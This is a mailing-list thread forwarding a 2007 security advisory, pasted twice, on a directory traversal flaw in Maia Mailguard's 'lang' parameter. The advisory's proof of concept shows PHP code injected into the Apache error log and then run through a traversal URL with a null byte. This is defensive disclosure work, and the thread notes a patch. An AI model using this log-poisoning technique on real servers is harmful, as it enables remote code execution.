Jo Rhett wrote: > How does this relate to amavisd? > > On Jul 5, 2007, at 4:18 PM, Michael Scheidell wrote: > > >> didn't see this anywhere, thought you might want to know: >> >> >> -- >> Michael Scheidell, CTO >> SECNAP Network Security Corporation >> Keep up to date with latest information on IT security: Real time >> security alerts: >> http://www.secnap.com/news >> >> >> -----Original Message----- >> From: Netragard Security Advisories [mailto:[EMAIL PROTECTED] >> Sent: Thursday, July 05, 2007 11:19 AM >> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; >> [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; >> [EMAIL PROTECTED]; [EMAIL PROTECTED]; >> [EMAIL PROTECTED] >> Subject: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary >> Code Execution][NETRAGARD-20070628] >> >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> *************************** NETRAGARD ADVISORY >> ************************ >> http://www.netragard.com >> "We make IT Safe" >> [Advisory Summary] >> - >> ---------------------------------------------------------------------- >> - >> Advisory Author : Adriel T. Desautels >> Advisory ID : NETRAGARD-20070628 >> Product Name : Maia Mailguard >> Product Version : <= 1.0.2 FreeBSD and Possibly More >> Vendor Name : http://www.miamailguard.com >> Type of Vulnerability : Directory Traversal / File Read >> Effort (1-10 where 1 == easy) : 2 >> Impact : Arbitrary Code Execution >> Vendor Notified : Yes >> Patch Released : N/A >> Discovery Date : 06/10/2007 >> >> >> >> >> [POSTING NOTICE] >> - >> ---------------------------------------------------------------------- >> - >> If you intend to post this advisory on your web-site you must >> provide a >> clickable link back to http://www.netragard.com as the contents of >> this >> advisory may be updated without notice. >> >> >> >> >> [Product Description] >> - >> ---------------------------------------------------------------------- >> - >> "Maia Mailguard is a web-based interface and management system >> based on >> the popular amavisd-new e-mail scanner and SpamAssassin. Written in >> Perl >> and PHP, Maia Mailguard gives end-users control over how their mail is >> processed by virus scanners and spam filters, while giving mail >> administrators the power to configure site-wide defaults and limits." >> >> - -- http://www.miamailguard.com -- >> >> >> >> >> [Technical Summary] >> - >> ---------------------------------------------------------------------- >> - >> A Directory Traversal vulnerability exists in the Maia Mailguard Web >> Application that enables an attacker to execute arbitrary commands on >> the affected system. >> >> >> >> >> [Technical Details] >> - >> ---------------------------------------------------------------------- >> - >> Improper input validation on the "lang" variable in Maia Mailguard web >> application has resulted in a Directory Traversal vulnerability >> that can >> be used to execute arbitrary commands on he affected system, or, to >> read >> arbitrary files on the affected system. >> >> >> >> >> [Proof Of Concept] >> - >> ---------------------------------------------------------------------- >> - >> 1-) An attacker can inject code into the httpd-error.log file by >> connecting to port 80 on the affected system and issuing a "get >> <CODE HERE>" command. See example below: >> >> the-wretched:~ simon$ telnet maiatest.snosoft.com 80 >> Trying 10.0.0.128... >> Connected to maiatest.snosoft.com. >> Escape character is '^]'. >> >> get <pre>><?php system('ls -laf /var/log');?> >> >> HTTP/1.1 400 Bad Request >> Date: Wed, 20 Jun 2007 21:31:58 GMT >> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/ >> 2.8.28 >> OpenSSL/0.9.7e-p1 >> Connection: close >> Content-Type: text/html; charset=iso-8859-1 >> >> 2-) Once the attacker has injected his code into the log file, the >> code >> can be executed by forcing the web application to read the log >> file. >> When the log file is read, the code is executed. Below is an >> example >> of code execution: >> >> the-wretched:~ simon$ wget >> http://maiatest.snosoft.com/maia/login.php?lang= >> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt >> >> >> >> >> [Vendor Status] >> - >> ---------------------------------------------------------------------- >> - >> Vendor has been notified and was quick to resolve the issue. >> >> >> >> >> [Vendor Comments] >> - >> ---------------------------------------------------------------------- >> - >> "The only addition that I had was that it seems to only affect systems >> like freebsd... It would be nice to nail that down. It suspect the >> root security issue is really with the php and file-system >> interaction... my patch just simply works around and blocks the root >> problem. From my developer point of view, I'm asking for one file >> and the file-system is giving us something else. That's a serious >> risk. >> If we could at least express that concern, I think that would be >> prudent. >> >> Chicken and egg problem, I was kinda waiting on you to post our own >> ticket, but.... I can add a comment afterwards. OK. Here's our ticket >> which also references the changeset: >> >> http://www.maiamailguard.org/maia/ticket/479 >> >> A unified patch may be retrieved from: http://www.maiamailguard.org/ >> maia/changeset/1184?format=diff&new=1184 >> >> David Morton" >> >> >> >> >> [Disclaimer] >> - >> ----------------------http:// >> www.netragard.com------------------------- >> Netragard, L.L.C. assumes no liability for the use of the information >> provided in this advisory. This advisory was released in an effort to >> help the I.T. community protect themselves against a potentially >> dangerous security hole. This advisory is not an attempt to solicit >> business. >> >> <a href="http://www.netragard.com> >> http://www.netragard.com >> </a> >> >> >> >> >> >> >> >> -----BEGIN PGP SIGNATURE----- >> Version: GnuPG v1.4.5 (Darwin) >> >> iD8DBQFGjQvXQwbn1P9Iaa0RAtkkAKCLZzwMLPPejeXmpXoYCMqvGdaF4QCgqALm >> 4LRwop09S8YjiKDwTSpvgXY= >> =TeIH >> -----END PGP SIGNATURE----- >> >> ______________________________________________________________________ >> ___ >> This email has been scanned and certified safe by SpammerTrap(tm). >> For Information please see http://www.spammertrap.com >> ______________________________________________________________________ >> ___ >> >> >> *************************** NETRAGARD ADVISORY >> ************************ >> http://www.netragard.com >> "We make IT Safe" >> [Advisory Summary] >> ---------------------------------------------------------------------- >> - >> Advisory Author : Adriel T. Desautels >> Advisory ID : NETRAGARD-20070628 >> Product Name : Maia Mailguard >> Product Version : <= 1.0.2 (All Platforms) >> Vendor Name : http://www.miamailguard.com >> Type of Vulnerability : Directory Traversal / File Read >> Effort (1-10 where 1 == easy) : 2 >> Impact : Arbitrary Code Execution >> Vendor Notified : Yes >> Patch Released : N/A >> Discovery Date : 06/10/2007 >> >> [POSTING NOTICE] >> ---------------------------------------------------------------------- >> - >> If you intend to post this advisory on your web-site you must provide >> a clickable link back to http://www.netragard.com as the contents of >> this advisory may be updated without notice. >> >> [Product Description] >> ---------------------------------------------------------------------- >> - >> "Maia Mailguard is a web-based interface and management system >> based on >> the popular amavisd-new e-mail scanner and SpamAssassin. Written in >> Perl >> and PHP, Maia Mailguard gives end-users control over how their mail is >> processed by virus scanners and spam filters, while giving mail >> administrators the power to configure site-wide defaults and limits." >> >> -- http://www.miamailguard.com -- >> >> [Technical Summary] >> ---------------------------------------------------------------------- >> - >> A Directory Traversal vulnerability exists in the Maia Mailguard Web >> Application that enables an attacker to execute arbitrary commands on >> the affected system. >> >> [Technical Details] >> ---------------------------------------------------------------------- >> - >> Improper input validation on the "lang" variable in Maia Mailguard web >> application has resulted in a Directory Traversal vulnerability that >> can be used to execute arbitrary commands on he affected system, >> or, to >> read arbitrary files on the affected system. >> >> [Proof Of Concept] >> ---------------------------------------------------------------------- >> - >> 1-) An attacker can inject code into the httpd-error.log file by >> connecting to port 80 on the affected system and issuing a "get >> <CODE HERE>" command. See example below: >> >> the-wretched:~ simon$ telnet maiatest.snosoft.com 80 >> Trying 10.0.0.128... >> Connected to maiatest.snosoft.com. >> Escape character is '^]'. >> >> get <pre>><?php system('ls -laf /var/log');?> >> >> HTTP/1.1 400 Bad Request >> Date: Wed, 20 Jun 2007 21:31:58 GMT >> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/ >> 2.8.28 OpenSSL/0.9.7e-p1 >> Connection: close >> Content-Type: text/html; charset=iso-8859-1 >> >> 2-) Once the attacker has injected his code into the log file, the >> code >> can be executed by forcing the web application to read the log >> file. >> When the log file is read, the code is executed. Below is an >> example >> of code execution: >> >> the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/ >> login.php?lang= >> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt >> >> [Vendor Status] >> ---------------------------------------------------------------------- >> - >> Vendor has been notified and has been very quick to respond to and >> patch this issue. >> >> [Vendor Comments] >> ---------------------------------------------------------------------- >> - >> "The only addition that I had was that it seems to only affect systems >> like freebsd... It would be nice to nail that down. It suspect the >> root security issue is really with the php and filesystem >> interaction... my patch just simply works around and blocks the root >> problem. From my developer point of view, I'm asking for one file >> and the filesystem is giving us something else. That's a serious >> risk. If we could at least express that concern, I think that would >> be prudent. >> >> Chicken and egg problem, I was kinda waiting on you to post our own >> ticket, but.... I can add a comment afterwards. OK. >> Here's our ticket which also references the changeset: >> >> http://www.maiamailguard.org/maia/ticket/479 >> >> A unified patch may be retrieved from: http://www.maiamailguard.org/ >> maia/changeset/1184?format=diff&new=1184 >> >> David Morton" >> >> >> >> [Disclaimer] >> ----------------------http:// >> www.netragard.com------------------------- >> Netragard, L.L.C. assumes no liability for the use of the information >> provided in this advisory. This advisory was released in an effort to >> help the I.T. community protect themselves against a potentially >> dangerous security hole. This advisory is not an attempt to solicit >> business. >> >> <a href="http://www.netragard.com> >> http://www.netragard.com >> </a> >> >> >> >> >> >> >> >> ---------------------------------------------------------------------- >> --- >> This SF.net email is sponsored by DB2 Express >> Download DB2 Express C - the FREE version of DB2 express and take >> control of your XML. No limits. Just data. Click to get it now. >> http://sourceforge.net/powerbar/db2/ >> _______________________________________________ >> AMaViS-user mailing list >> [email protected] >> https://lists.sourceforge.net/lists/listinfo/amavis-user >> AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 >> AMaViS-HowTos:http://www.amavis.org/howto/ >> > > A lot of people use Maia Mailguard to control/configure their amavisd-new installations. So it makes sense to post the warning here as a friendly "in case you didn't know". Not everyone subscribes to every mailing list for every product they use. Remember, just because amavisd-new isn't affected directly (or at all in this case) doesn't mean it's not useful to know.
------------------------------------------------------------------------- This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ _______________________________________________ AMaViS-user mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
